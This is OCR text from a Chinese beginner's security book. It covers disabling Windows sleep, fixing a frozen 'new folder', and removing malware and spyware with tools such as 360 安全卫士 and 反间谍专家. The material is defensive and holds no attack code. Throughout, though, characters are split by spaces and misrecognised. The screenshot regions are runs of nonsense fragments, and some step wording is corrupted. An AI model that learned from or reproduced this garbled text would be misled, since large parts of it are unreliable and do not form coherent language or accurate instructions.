第 8 章 ”木马 病毒 的 防御 与 杀毒 软件 的 使 用 


小 试 身手 


练习 1: 禁止 计算 机 进入 睡眠 状态 
睡眠 是 计算 机 在 长 时 间 无 交互 的 情况 四 
下 ， 自 动 保护 计算 机 的 一 种 做 法 ， 但 是 对 
于 很 多 人 来 说 ， 挂 机 是 为 了 让 计算 机 自动 
完成 某 些 已 经 在 执行 的 任务 ， 如 计算 机 病 
毒 的 查 杀 。 此 时 ， 与 锁 屏 不 同 ， 计 算 机 自 
动 进入 睡眠 后 就 会 终止 这 些 进 程 ， 影 响 了 
用 户 的 体验 。 那 么 如 何 让 计算 机 即使 长 时 
间 不 操作 也 不 进入 睡眠 状态 呢 ? 具体 的 操 
作 步 骤 如 下 。 
[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “Windows 系统 ”一 “控制 面板 ” 
菜单 命令 ， 即 可 打开 “控制 面板 ”窗口 ， 
如 下 图 所 示 。 


回 控制 面板 - 0O x 
> 个 国 控制 面板 
nl] 


8.6 


文件 (月 查看 (V) 工具 


调整 计算 机 的 设置 查看 类 别 > 


系统 和 安全 


= 


用 户 帐 户 
Ow 


. | 外 观 和 个 性 化 
时 钟 、 语 言 和 


总 3 


得 看 你 的 计算 机 状 


网 络 和 
Internet 
查看 网 络 状 术 和 任 


多 ， 


[se 图 在 “搜索 控制 ”文本 框 中 输入 “电源 ”， 
进入 “电源 - 控制 面板 ”窗口 ， 如 下 图 所 示 。 


国 电源 - 控制 面板 - OO x 
《 ”个 国 ， 控 制 面板 ， vo 电 测 
文件 月” 编辑 (E) ”这 看 V) 工具 Tm) 


选择 电源 计 : 
先入 电 源 计 : 


人 @ 扫 寺 对 电源 -的 Windows 部 助 和 支持 


137 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 图 单 去 “选择 电源 计划 ”链接 ,进入 “ 电 
源 选 项 ”窗口 ， 在 其 中 选中 “平衡 (推荐 )” 
单 选 按钮 ， 如 下 图 所 示 。 


半 本 页 一 Oo x 
人 ~ 小 洱 < 本 HH 和 声音 电源 天 质 
文件 月 ”篇 霹 (E) 坦 看 工具 ( 


ee 选择 或 铂 定 义 电源 计划 

电源 记 划 是 月 于 管理 计算 纪 如 何 羡 用 只 源 的 一 奉 要 件 和 系统 
创 本 电源 HH 划 Te 瑟 眠 等。 得 诉 径 言 关 电源 计划 的 话 簿 

只 过 关闭 显示 器 的 时 间 


二 到 计划 
时 更 改 计算 机 后 吕 时 间 
加 平面 叭 攻 更 ta 
利用 可 用 的 机 人 全 动 于 本 必 站 
〇 诺 i 
尽 可 能 降 儿 计算 机 信 毅 情 . 
号 请 参 网 显示 Nit 划 


用 户 帐 户 


[Eee 加 单 击 “ 平 衡 〔( 推 荐 )” 单 选 按钮 右 侧 
的 “更 改 计划 设置 ”链接 ， 即 可 打开 “ 编 
辑 计 划 设 置 ”对 话 框 ， 如 下 图 所 示 。 

必需 缠 计 划 设 置 - 0O x 

人 个 车 "思源.，， 妨 强 计划 . v 书 省 雪 深 制 。 记 
文件 旧病 祖 (E) ”一 看 M 工具 中 


更 改 计划 的 设置 : 平衡 
选择 帘 相 计算 机 使 用 的 轿 蝇 设置 和 时 示 设 置 . 


哆 关 半 时 未 哮 10 分 帅 bd 
生 使 计算 机 进入 本 瞩 状 态 ， |30 分 名 ~ 
更 改 训 级 电源 设置 (C) 
还 原 此 计划 的 默认 设置 (R) 
生存 个 改 取消 


Step 图 单 直 “ 使 计算 机 进入 睡眠 状态 ” 右 便 
的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 选择 “从 
不 ”选项 ， 如 下 图 所 示 。 

i - oOo 


¢ 个 省“ 电 困 。， 拓 it 
HN RE) EV IRM 


于 改 计划 的 设置 : 平 酯 
沈 提 关 季 | 中 全 m5 轴 委 和 史记 生 


加 a0 10 5 入 


EE 


0 3 
ES 
四 
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[step 较 单 击 “ 更 改 高 级 电源 设置 ”链接 ， 打 
开 “ 电 源 选项 ”对 话 框 ， 在 其 中 展开 “ 电 
源 按钮 和 盖子 ”一 “睡眠 按钮 操作 ”选项 ， 
然后 单 击 “ 有 睡眠 ” 右 侧 的 下 拉 按 钮 ， 在 弹 
出 下 拉 列 表 中 选择 “不 采取 任何 操作 ”选项 ， 
如 下 图 所 示 。 


导电 项 ? x 
天 各 设置 


至 作 要 十 义 的 电源 :| 划 ， 和 后 远 托 他 项 委 计算 员 管 理 
名 sme 


吉隆 到 1 
四 点 醒 背 景 设置 

图 无 渤 适 配 回 设置 

加 三 沈 

四 US8 设置 

四 Intel(R) Graphics Settings 

5 电源 过 各 和 关子 


[step 国 单 去 “确定 ”按钮 ， 这 样 计算 机 就 不 
会 进入 睡眠 状态 了 。 


练习 2: 救 活 假死 的 新 建文 件 夹 


新 建文 件 夹 是 在 进行 计算 机 操作 时 非 量 
常常 用 的 功能 之 一 ， 最 近 发 现 Windows 10 
系统 会 出 现 新 建文 件 夹 假死 的 情况 ， 那 么 
如 何 救 活 假 死 的 新 建文 件 夹 呢 ? 具体 的 操 
作 步 又 如 下 。 

[sep 回 在 Windows 10 中 随便 打开 一 个 文件 
夹 ， 这 里 打开 “办 公文 件 ” 文 件 夹 ， 如 下 
图 所 示 。 


生 Windowslotc < 
1 个 项 目 


Step 图 选择 “查看 ”选项 卡 ， 在 弹出 的 面板 
中 单 击 “ 选 项 ”按钮 ， 如 下 图 所 示 。 


出 | 回 目 =。 | na 
E 境 
四 画 址 大 图 款 匡 | 大 到 

加 E 

Sg BE mi 

窗 癌 

园 图 片 

国 交 和 

量 f 受 

山 吝 示 

国 s 西 

i Windows10 (Gy ¢ 
1 个 项 目 


看 ”选项 卡 ， 在 “高 级 设置 "列表 中 选中 “ 始 
终 显示 图 标 ， 从 不 显示 缩 略 图 ” 复 选 杠 
如 下 图 所 示 。 


ET 


[Ga 


E 吕 国 在 “文件 来 选项 ”对 话 框 中 同时 选中 
“在 单独 的 进程 中 打开 文件 天 窗口 ” 复 选 框 ， 
如 下 图 所 示 。 


RNA 


第 8 章 ”木马 病毒 的 防御 与 杀毒 软件 的 使 用 


step 图 右 击 假死 的 文件 天 ， 在 弹出 的 快捷 菜 
单 中 选择 “属性 ”菜单 命令 ， 打 开 “ 办 公 
文件 属性 ”对 话 框 ， 如 下 图 所 示 。 


号 现 共享 。 交 全 。 以 前 版 本 “ 自 定 义 


有 Ps 


ee: TH 去 

位 豆 : CAUsersAdministrator\Desltop 

ds 0 

占用 写生 0 

包含 : 1 个 文件 ，0 个 文件 实 

创建 时 同 2019 年 3 月 23 日 ，18:18:55 

性: 回 只 凌 ( 应 月 于 文件 夫 中 抱 文 作 MR) 
[mL RO) 


Ce lw 
[Sep 图 单 去“ 高级” 按钮， 在 打开 的 “高 级 
属性 ”窗口 中 ， 取 消 选中 的 “除了 文件 属 
性 外 ， 还 允许 索引 此 文件 夹 中 文件 的 内 容 ” 
复 选 框 ， 如 下 图 所 示 。 


高 级 属性 x 


NR) 


为 该 文件 交 运 避 你 下 要 的 设置 
当 你 在 -属性 -对 括 必 中 单 去 -确定 -或 [ 应 用 "时 ， 系 统 会 亲 同 你 是 否 格 这 
此 更 玖 同时 庙 轨 于 所 有 子 文件 交 和 文件 . 

和 和 要 引 屋 性 

口 以 存档 文件 交 (A) 


口 除了 文件 时 性 外 ， 还 允许 宗 引 此 文件 认 牛 文件 的 内 容 (I) 


HalD) 
三 


[ee 国 单 击 “ 确 定 ”按钮 ， 重 新 启动 计算 
机 ， 这 时 就 会 发 现 新 建文 件 天 假死 的 现象 
没有 了 。 
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第 9 竟 


网 络 流氓 软件 与 问 谍 


软件 的 清理 


在 上 网 的 过 程 中 ， 有 时 会 出 现 网 页 一 直 在 刷新 ， 或 根本 不 会 出 现 想 要 搜索 的 页 面 内 
容 、 上 网 速度 很 慢 等 一 系列 问题 ， 这 很 可 能 是 因为 计算 机 感染 恶意 软件 或 间谍 软件 所 导致 


的 。 本 章 介绍 网 络 流 谍 软件 与 间谍 软件 的 清理 ， 主 要 内 容 包括 恶意 软件 的 清 


的 清理 等 内 容 。 


9.1 感染 恶意 或 间谍 软件 后 的 
症状 


恶意 或 间谍 软件 主要 是 指 某 些 共享 或 
者 免费 软件 在 未 经 用 户 允 许 或 授权 的 情况 
下 ， 采 用 不 正当 的 方式 ， 利 用 强制 注册 功 
能 或 者 采用 诱骗 、 试 用 等 手段 将 该 软件 所 
捆绑 的 各 类 恶意 插件 强制 性 的 安装 到 用 户 
的 计算 机 系统 上 ， 从 而 控制 计算 机 。 计 算 
机 感染 恶意 或 间谍 软件 后 常见 的 几 种 症状 
如 下 。 


1. 桌面 上 出 现 了 莫名 其 妙 的 图 标 


用 户 在 下 载 并 安装 一 些 正常 软件 后 
会 发 现 桌 面 上 出 现 了 一 些 莫名 其 妙 的 图 标 ， 
这 些 软件 很 有 可 能 是 正常 软件 附带 的 一 些 
其 他 软件 ， 这 些 软件 会 在 计算 机 用 户 毫 不 
知情 的 情况 安装 到 自己 的 计算 机 中 。 


2. 系统 或 程序 不 断 月 溃 


导致 计算 机 系统 或 应 用 程序 不 断 崩 溃 的 
原因 有 很 多 ， 有 可 能 是 因为 用 户 的 软件 和 硬 
件 之 间 存 在 兼容 问题 所 导致 的 。 但 是 ， 也 有 

可 能 是 像 Rootkits 这 种 类 型 的 恶意 软件 感染 
Windows 内 核 后 ， 造 成 系统 崩溃 。 


理 、 间 谍 软 件 


3. 毫 无 任何 迹象 的 感染 

即便 是 用 户 的 计算 机 在 运行 过 程 中 不 
存在 任何 问题 ， 那 也 并 不 意味 着 是 安全 的 ， 
用 户 仍然 有 可 能 已 经 感染 了 恶意 或 间谍 软 
件 。 像 僵尸 网 络 和 其 他 用 于 盗窃 用 户 数据 
的 恶意 软件 是 很 难 被 发 现 的， 除非 计算 机 
用 户 使 用 了 安全 防护 软件 来 扫描 系统 ， 才 
能 发 现 这 些 恶 意 或 间谍 软件 。 


恶意 软件 的 清理 


软件 在 安装 的 过 程 中 ， 一 些 流氓 软件 
也 有 可 能 会 强制 安装 进 一 些 信息 ， 并 会 在 
注册 表 中 添加 相关 的 信息 ， 普通 的 印 载 广 
法 并 不 能 将 流氓 彻底 删除 ， 如 果 想 将 软件 
所 有 的 信息 删除 掉 ， 可 以 使 用 第 三 方 软件 
来 卸载 程序 。 


绝招 1: 使 用 《360 安 全 卫士 》 清 


使 用 《360 安全 卫士 》 可 以 印 载 恶 意 软 训 
件 ， 具 体 的 操作 步骤 如 下 。 


9.2 


[step 图 启动 《360 安全 卫士 》， 在 打开 的 主 
界面 中 选择 “电脑 清理 ”选项 ， 进 入 计算 
机 清理 界面 ， 如 下 图 所 示 。 


第 9 章 “网络 流氓 软件 与 间谍 软 件 的 清 


[step 图 进入 《360 软件 管家 》 窗 口 ， 选 择 “ 秀 
载 ” 选 项 卡 ， 在 “软件 名 称 ” 列 表 中 选择 
需要 印 载 的 软件 , 如 这 里 选择 360 手 机 助手 ， 
单 击 其 右 侧 的 “ 印 载 ”按钮 ， 如 下 图 所 示 。 


© 已 选择 1 项 清理 类 型 


Li Ds 


@” i = GED 
入 "9 习 ar pa "Eel sm ee es 
[Bs 图 在 计算 机 清理 界面 中 选择 “清理 插件 ” 要 
选项 ， 然 后 单 击 “ 一 键 扫 描 ” 按 钮 ， 即 可 
扫描 系统 中 的 流 谍 软 件 ， 如 下 图 所 示 。 
= | L3 ~ ba 条 
后 扫 摘 出 2 个 可 清理 项 ms 馆 清 理 弹出 «360 手机 助手 印 载 ” 对 话 框 ， 
er 如 下 图 所 示 。 
ae FEED 
OOeaog ee 日 遇 到 问题 需要 和 卸载? 让 我 们 帮助 您 吧 。 


Bp 图 扫描 完成 后 ， 单 击 “ 一 键 清理 ”按钮 ， 
即 可 对 扫描 出 来 的 流 误 软 件 进行 清理 ， 并 
给 出 清理 完成 后 的 信息 提示 ， 如 下 图 所 示 。 时 和 主 雪 区 。 》 人 问题 有 他 


© 我 用 他 产品 人 | 二 二 过 


9 uspiasFE 园 六 sa 种 


2 单 击 “直接 孝 栽 ”按钮 ， 即 可 开始 名 
4 站 世 载 选 中 的 软件 ， 如 下 图 所 示 。 


step 园 另外， 还 可 以 在 《360 安全 卫士 》 窗 
口中 单 击 “软件 管家 ”按钮 ， 如 下 图 所 示 。 


® 次 电脑 体检 100 分 , 请 继续 保持 
立即 体检 


as step 图 纯 载 完成 后 ， 会 弹出 一 个 信息 提示 
Ee 框 ， 如 下 图 所 示 。 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


360 手 机 助手 知 载 X 


【i 360 手 机 助手 已 成 功 地 从 您 的 计算 机 移 除 。 


绝招 2: 使 用 《金山 清理 专家 》 清 理 


《金山 清理 专家 》 的 首要 功能 就 是 查 杀 
恶意 软件 ， 在 安装 《金山 清理 专家 》 系 统 
之 后 ， 就 可 以 对 本 地 机 器 上 的 恶意 软件 进 
行 查 杀 ， 具 体 的 操作 步骤 如 下 。 

[step 图 双 去 桌面 上 的 《金山 清理 专家 》 快 捷 
图 标 ， 即 可 进入 《人 金山 清理 专家 》 主 窗口 ， 


如 下 图 所 示 。 
| 部 ES 了 275 二 二 条 .二 - 闫 
金山 清理 专家 GB 号 多 YY 
ingdubanet A 
WT BB 清寺 专家 兄 新 后 ， 侈 还 浴 有 为 系统 打分 喇 1 
[ED | vewxxwny， 
WTI teen, Ran ps， 4 to、 aes 
元 J 和 9、 庆 全、 夫人 全 
i 9， 
ET 
| [| 
[ew 
安全 本 训 害 办 戏 抽 革 ， 和 齐 中 而 史 所 下 二天 。 天 给 IX 意 了 具 
四 qe 下。 站 基本 信息 ia 
@ ER 20 
本 Ra 
ET 


[se 加 在 “恶意 软件 查 杀 ”选项 卡 中 ， 可 以 
对 恶意 软件 、 第 三 方 插件 和 信任 插件 进行 
查 杀 ， 单 击 “恶意 软件 ”选项 ， 即 可 自动 
对 恶意 软件 进行 扫描 ， 如 下 图 所 示 。 


= 0 x 


各 


人 


© 


各 小 了 T 角 4 册 者 下 


step 图 在 扫描 结束 后 ， 将 显示 出 扫描 结果 ， 
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如 果 本 机 存在 恶意 软件 ， 只 用 在 选中 扫描 
出 的 恶意 软件 之 后 ， 单 击 “ 清 除 选 定 项 ” 
按钮 ， 即 可 将 恶意 软件 删除 ， 如 下 图 所 示 。 


6 


0 SO OY OY 


和 


B22 


[a 


绝招 3: 使 用 《恶意 软件 清理 助手 》 清 理 


《恶意 软件 清理 助手 》 配 合 独 有 的 动态 吕 
分 析 技 术 和 不 断 升级 的 特征 库 ， 使 查 杀 恶 
意 软件 更 加 全 面 彻底 ， 全 新 设计 的 进程 管 
理 模 块 可 以 显示 隐藏 进程 ， 让 用 户 对 计算 
机 的 运行 状态 做 到 一 目 了 然 ， 更 可 以 强制 
结束 顽固 进程 。 

使 用 《恶意 软件 清理 助手 》 清 除 恶 意 
软件 的 操作 步骤 如 下 。 
双击 《恶意 软件 清理 助手 》 的 可 执行 
文件 ， 即 可 打开 《恶意 软件 清理 助手 》 的 
工作 界面 ， 如 下 图 所 示 。 


和 
要 意 名 们 清理 助 季 
teeter ieneat com 
rE Ra RE = 
na | ean 
= ea as 
Ee 天 于 到 3 
Bessoes | eastr om 
Dr。 | xs zeroapza 
2 i 
i Ls uaase 
Pe 
Er 
SPIE | | mw en 
ane 
Pause Lesa 
二 
renee 
rs EE 


[Eee 图 单 去 “开始 扫描 ”按钮 ， 即 可 弹出 “ 正 
在 扫描 ”对 话 框 , 在 其 中 显示 了 扫描 的 进度 ， 
如 下 图 所 示 。 


step 图 扫描 完成 后 ， 会 在 “恶意 软件 检测 ” 
窗 格 中 显示 扫描 出 来 的 恶意 软件 程序 列表 ， 
如 下 图 所 示 。 


ori sans 
站 窜 较 你 清 埋 助手 
bppyfwram temsof com 
| 
isanse | | eumen Ea 
- 十 
Puan | (i 
了 日 a ep/embaidu co 
| 旧 于 = 二 一 
: Ne/ dmaanne 
ee wr 2 Fr 
aa | 日 wma mas 
“日 Ra EF 
Ei | 二 meme woeem 上 
Wl| Ss 
Pamma || "ppm es 
J | 
oo ou wes 
a 了 ee 


[step 园 单 去 “立即 清理 ”按钮 ， 会 弹出 一 个 
信息 提示 框 ， 重 新 启动 计算 机 ， 即 可 将 扫 
描 出 来 的 恶意 软件 全 部 清理 ， 如 下 图 所 示 。 


WAV 机 


选择 “进程 服务 管理 ”选项 ， 即 可 在 
右 侧 的 “进程 服务 管理 ” 窗 格 中 显示 当前 系 
统 的 进程 信息 ,选择 需要 结束 的 进程 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “结束 进程 ”菜单 
命令 ， 即 可 结束 该 进程 ， 如 下 图 所 示 。 


ER 


王 唐 多 们 清理 助 季 
ple iammeaham 
CT eax | 
EE 
EE Dk 
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绝招 4: 使 用 《恶意 软件 查 杀 助理 》 清 理 


《恶意 软件 查 杀 助理 》 是 针对 目前 网 上 
流行 的 各 种 木马 病毒 以 及 恶意 软件 开发 的 。 
《恶意 软件 查 杀 助理 》 可 以 查 杀 超 过 900 
多 款 恶 意 软件 、 木 马 病毒 插件 ， 找 出 隐匿 
在 系统 中 的 毒手 ， 具 体 的 操作 步骤 如 下 。 
[se 四 安装 软件 后 ， 单 击 桌 面 上 的 《恶意 软 
件 查 杀 助 理 》 程 序 图 标 ， 启动 《恶意 软件 
查 杀 助理 》， 其 主 界面 如 下 图 所 示 。 
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元 和 用 划 吉 从 否 亲 于 
Hammersa waen anes 


区 5 : 一直， 请 
Nima -earweETTYanswexrianwsn 
二 更 项 上 请 更 忆 护 人 于 


ii 


Bs Lema ] 


ei 
谍 午 由 项 

矢 字 升级 翌 征 床 ,可 以 有 效 到 未 更 池 鬼 考 京 次 件 Me pe 

WED ee，rmemrreaaen 


六 本 可 以 天 加 六 和 的 和 下 人 件 


和 
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单 击 “ 立 即 扫 描 恶 意 软 件 ”按钮 ， 软 
件 开始 检测 计算 机 系统 ， 如 下 图 所 示 。 


[step 图 在 安装 《恶意 软件 查 杀 助理 》 软 件 的 
同时 ， 还 要 安装 一 个 《恶意 软件 查 杀 工具 》 
软件 ， 该 工具 需要 与 恶意 软件 查 杀 助 理 同 
时 运行 。 运 行 《恶意 软件 查 杀 工具 》， 主 界 
面 如 下 图 所 示 。 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


sre, 


Er 
CR Er 和 


Le | 


要 作 要 条 党， 安 更 天 六 LE 并 
FO 


> /NEN 


和 的 


单 击 “系统 扫 描 ” 按 钮 ， 软 件 开始 对 
计算 机 系统 进行 扫描 ， 并 实时 显示 扫描 过 
程 ， 如 下 图 所 示 。 


ae 一 一 二 
| [was | [smaaas| 
@ 移 提示 : “系统 扫描 ”完成 后 ， 用 户 可 以 
根据 软件 提示 的 结果 进行 进一步 的 清除 操 
作 。 因 此 ， 一 定 要 记得 经 常 对 计算 机 系统 
进行 系统 扫描 。 
9.3 ”间谍 软件 的 清理 


间谍 软件 是 一 种 能 够 在 用 户 不 知情 的 
情况 下 ， 在 其 计算 机 上 安装 后 门 、 收 集 用 
户 信息 的 软件 。 间 谍 软 件 以 恶意 后 门 程序 
的 形式 存在 ， 该 程序 可 以 打开 端口 、 启 动 
FTP 服务 器 ， 或 者 搜集 击 键 信息 并 将 信息 
反馈 给 攻击 者 。 


加 绝招 5: 使 用 《 反 间 谍 专 家 》 清 理 


使 用 《 反 间 谍 专 家 》 可 以 扫描 系统 薄 


” 弱 环节 以 及 全 面 扫描 硬盘 ， 智 能 检测 和 查 


杀 超 过 上 万 种 木马 、 蠕 虫 、 间 谍 软 件 等 ， 
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终止 它们 的 恶意 行为 。 当 检测 到 可 疑 文件 
时 ， 该 工具 还 可 以 将 其 隔离 ， 从 而 保护 系 
统 的 安全 。 

下 面 介绍 使 用 《 反 间 谍 专 家 》 软 件 的 
基本 步骤 。 


[seep 贺 运行 ( 反 间 谍 专 家 》 程 序 , 即 可 打开 《 反 
间谍 专家 》 主 界面 ， 从 中 可 以 看 出 反 间 谍 


专家 有 “快速 查 杀 ” 和 “完全 查 杀 ”两 种 
方式 ， 如 下 图 所 示 。 
si [LY 
"| Ox 
艾 3721 上 网 助手 
快速 吉 亲 本 
、spyware 等 下 软件 能 驻 久 在 用 户 
Ee ee 蕊 取 对 汪 意 软件 发 布 者 有 利 的 信息 。 
信和 友和 有 所 浊 行 入， 
完全 查 杀 
多 万 始 查 东 
在 辐 开 级 
用 工具 
RI ® 


[stee 国 在 “ 查 杀 ”栏目 中 单 击 “ 快 速 查 杀 ” 
按钮 ， 然 后 右边 的 窗口 中 单 击 “ 开 始 查 杀 ” 
按钮 ， 即 可 打开 “ 反 间 谍 专 家 - 扫描 状态 ” 
对 话 框 ， 如 下 图 所 示 。 


肥 肥 法 专 家 得 简 状态 


em 


闫 


C:\Windows\Systen32\ieproxy. Ql 
正在 扫 疡 , 已 醋 时 00 00 (3 


E33 
入 


| 0 ee 
系 坟 敏 所 区域 扫描 


[Eee 国 在 扫描 结束 后 ， 即 可 打开 “ 反 间 谍 专 
家 - 扫描 报告 ”对 话 框 ， 在 其 中 列 出 了 扫描 
到 的 恶意 代码 ， 如 下 图 所 示 。 


肥 宫 庄 专 家 打 乔 报 寺 


二 ,发 现 : 个 恶意 代码 ! 

SS 回 Qik 文件 关联 
路 径 : chm.fie\shel\open\command 
回 据 坟 : 修改 CHM 文 件 关联 的 可 妈 程 康 

= 回 HTA 文 件 关联 


路 径 : Nae Nopen\ nuit 
器 括 夫 : HTA 文 件 关联 被 


Step 加 单 击 “选择 全 部 ”按钮 ， 即 可 选中 全 
部 的 恶意 代码 ， 然 后 单 击 “ 清 除 ” 按 钮 ， 
即 可 快速 杀 除 扫描 到 的 恶意 代码 。 


和 全 代 沪 二 附 ，! 个 恶意 代码 从 所 训 区 中 谱 清除 


step 轿 如 果 要 彻底 扫描 并 查 杀 
需 采 用 “完全 查 杀 ”方式 。 在 《 反 间 谋 专 家 》 


恶意 代码 ， 则 


主 窗口 中 ， ee 查 杀 ”按钮 ， 即 可 
打开 “完全 查 杀 ”对 话 框 。 从 中 可 以 看 出 
种 快捷 方式 供 远 择 ， 这 里 选 
中 “扫描 本 地 硬盘 中 的 所 有 文件 ” 单 选 按 
钮 ， 如 下 图 所 示 。 


针 肥 问 谋 专 家 [xj 
[一 下 一 加 
3721 上 网 助手 
快速 查 杀 


轩 33 抽 rindows 系 纺 目 录 下 的 文件 
国  3 冯 0 文告 中 的 文件 


时 “Ba 有 


自 定义 扫描 
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删除 这 些 恶 意 代 码 ， 如 下 图 所 示 。 


扫 共 完成, 发 现 91 个 恶意 代码 ? 四 
后 - 回 Doubledick Cooke 数量 :1 日 
路 径 : C:\...\Temp\Cookies\admiristrator@doublecick[1].txt 已 隔 襄 
回 拓 坟 :无 
= 回 利用 M504-028 泼 洞 9JPEG 文 件 数量 :90 
回 路 全 ;水 得 科 技 软件 礼 包 \ 图 片 ,建文 伯 严 LPG 已 高 
医术 无 
路 径 ; E:\ 永 尖 科 技 软件 礼包 \ 图 片 \ 新 建文 件 天 \2,JPG Ej 
回 项 示 无 [ea 
国王 .再 [EE 


[step 图 在 《 反 间 谍 专 家 》 主 界面 切换 到 “ 常 
用 工具 ”栏目 中 ， 单 击 “ 系 统 免 疫 ” 按 钮 ， 
即 可 打开 “系统 免疫 ”对 话 框 ， 单 击 “启用 ” 
按钮 ， 即 可 确保 系统 不 受到 恶意 程序 的 攻 
击 ， 如 下 图 所 示 。 


类。 HS 定好 的 X 件 | 


2 下 可 
反 间 谋 专 家 
9 区 二 Hoh 
[pi 系统 免疫 功能 
由 局 动 系统 免疫 功能 可 以 保证 作 的 系统 不 两 到 其 上 二 意 网 
站、 间 这 软件 、 有 韦 ketivsx 控 件 的 保 拓 。 
可 看 已 区 六 的 数量 ， 以 及 通过 
多 “ 搜 司 ” 按 本 未 全 外 已 经 启用 的 免疫 功能 ， 
Tz 复 
ok8 项 已 局 用 / 总 共 1089 项 。 
所 区 CA 遇 ] 和 因 _ ] [mm] 
WI 页 图 


人 


step 园 单 击 “开始 查 杀 ”按钮 ， 即 可 打开 “ 反 
间谍 专家 - 扫描 状态 ”对 话 框 ， 在 其 中 可 以 
查看 查 杀 进 程 ， 如 下 图 所 示 。 


要 同调 专家 “ 生 基 次 老 


检测 并 查 杀 悠 电脑 中 的 各 种 恶意 代码 , 保护 您 的 电脑 安全 


EE:3 名 称 
扫描 完成 内 存 驻 留 程序 扫描 D/424 
扫描 完成 注册 表 扫 描 0113 
扫描 完成 Cookie，Adware 扫 撕 01336 
扫描 完成 系统 第 局 区域 扫描 0/2382 
屿 正在 扫描 。 。 碰 盘 文 片 扫 措 of2190 


C:\WINDOWS\system32\ dlleac hanes A 
正在 扫描 ,已 灶 时 00:00:07 


Cm 
step 园 待 扫描 结束 后 ， 即 可 打开 “ 反 间 谍 专 
家 - 扫描 报告 ”对 话 框 ， 在 其 中 列 出 所 扫描 
到 的 恶意 代码 。 选 中 要 清除 的 恶意 代码 前 
面 的 复 选 框 后 ， 单 击 “清除 ”按钮 ， 即 可 


单 击 “ 反 间谍 专家 - 耻 修复 ”按钮 ， 
即 可 打开 “下 修复 ”对 话 框 ， 在 选择 需要 
修复 的 项 目 后 ， 单 击 “ 立 即 修复 ”按钮 ， 
如 下 图 所 示 ， 即 可 将 正 恢 复 到 其 原始 状态 。 


Sr ， 点 击 “立即 修复 ” 


step 罗 | 单 去 “隔离 区 ”按钮 ， 则 可 查看 已 经 
隔离 的 恶意 代码 ， 选 择 隔离 的 恶意 项 目 ， 


SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


可 以 对 其 进行 恢复 或 清除 操作 ， 如 下 图 
所 示 。 


页 同 旋 专 家 陋 直 区 
恶意 代码 已 径 被 隔 高 区 进 1 


i 


行 隔 高 ， 不 会 对 您 的 系 纺 和 过 成 危 宕 。 您 可 以 按 自 己 的 再 要 
行 清除 ， 或 是 将 其 恢复 至 原来 的 目录 位 置 下 。 


三 Ea EE 


服务 进行 相应 的 管理 ， 如 下 图 所 示 。 
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step 辆 单 击 “高 级 工具 ”功能 栏 , 即 可 进入 “高 
级 工具 ”设置 界面 ， 如 下 图 所 示 。 


Dd EY 
查 杀 全 
BE om 
= 进程 管理 
于 看 系 坟 中 正在 运行 的 进程 ECL 
进 和 着 理 路 
服务 各 理 
束 看 系统 中 正在 运行 的 服务 LEED 
服务 管理 器 
网站 连接 各 理 
号 于 看 系统 网 络 连 报 居 老 ET 
过 接管 理 


step 酉 单 击 “ 进 程 管理 ”按钮 ， 即 可 打开 “ 反 
间谍 专家 - 进程 管理 器 ”对 话 框 ， 在 其 中 对 
进程 进行 相应 的 管理 ， 如 下 图 所 示 。 
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明 访 寺 办 为 人 话 首 于 学 采 拉 着 六 和 好 化 东 统 去 量 ,Hs-Dos 弛 动 各 称 闪 似 LPT1EL 及 Cou 
Yin32 高 地 系 纺 和 三 行 任 Yindows 营 陆 过 程 


ES Eien | [Xie ] [ 站 ] 


step 图 单 击 “ 服 务 管理 ”按钮 ， 即 可 打开 “ 反 
间谍 专家 - 服务 管理 器 ”对 话 框 ， 在 其 中 对 
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[Step 本 单 击 “ 网 络 连 接管 理 ” 按 钮 ， 即 可 打 
开 “ 反 间谍 专家 - 网络 连 接管 理 器 ”对 话 框 ， 
在 其 中 对 网 络 连 接 进 行 相应 的 管理 ， 如 下 
图 所 示 。 


RR 


进程 端口 “本 地 IF 到 类 型 
ebThunder exe 100 0.0.0.0 TCF ”等待 连接 
[= 0.0.0.0 TCP 。 等 待 连接 
[systwm] 192. 168.0.11 WP 。 等 待 关闭 
[Systen] 192. 168.0.11 WF ”等 待 关闭 
[Systen] 139 。 192.168.0.1 Tc 
[System] 45 0.0.0.0 Tc 
[systm] 445 0.0.0.0 wp 
固 rammaer exe 1004 0.0.0.0 wp 
口 uce 1025 。 127.0.0.1 TP 
svehost exe 101 0.00.0 wp 
[i losz 127.0.0.1 wr 
svehost exe 1083 0000 wp 
svehost. exe lo 0.0.0.0 wr 
图"omandae exe 1339 0000 wp 
[ElebThnder exe 1349 127.0.0.1 wr 
CE Gs) 
3 » 66 po 站 
step 图 选择 “工具 ”一 “综合 设 定 ” 菜 单项 ， 


即 可 打开 “综合 设 定 ” 对 话 框 ， 在 其 中 对 
扫描 设 定 进行 相应 的 设置 ， 如 下 图 所 示 。 


扫描 设 定 | 查 杀 设 定 】 其 好 ] 


扫描 设 定 
厂 扫描 压缩 文件 
0 


克 避 扫 描 识 别 的 扩展 名 ( exe, 


al1，. ws 等 ) 


step 图 选择 “ 查 杀 设 定 ”选项 卡 , 即 可 进入 “ 查 
杀 设 定 ” 设 置 界面 ， 在 其 中 设 定 发 现 恶 意 
程序 时 的 缺 省 动作 ， 如 下 图 所 示 。 
3 
扫描 设 定 | 查 杀 设 定 | 其 地 
发 现 生意 程序 时 的 缺 省 动作 

他 提示 个 其 除 个 隔离 


广 忽略 


[step 贺 选择 “其 他 ”选项 卡 ， 即 可 进入 “其 
他 ”设置 界面 ， 在 其 中 选中 “允许 右键 菜 
单 选 择 扫描 ” 复 选 框 ， 单 击 “ 确 定 ”按钮 ， 
即 可 完成 设置 操作 ， 如 下 图 所 示 。 


扫描 设 定 | 查 杀 设 定 】 其 好 | 
右键 扫描 
| 允许 右键 菜单 选择 扫描 


《Windows 清理 助手 》 是 一 款 可 以 自 定 
义 规则 的 查 杀 程序 ， 使 用 它 可 以 清理 网 上 
大 部 分 间谍 软件 ， 而 且 还 可 以 根据 用 户 的 
需求 建立 白 名 单 与 黑 名 单 ， 做 到 可 完全 自 
定义 是 否 清理 。 

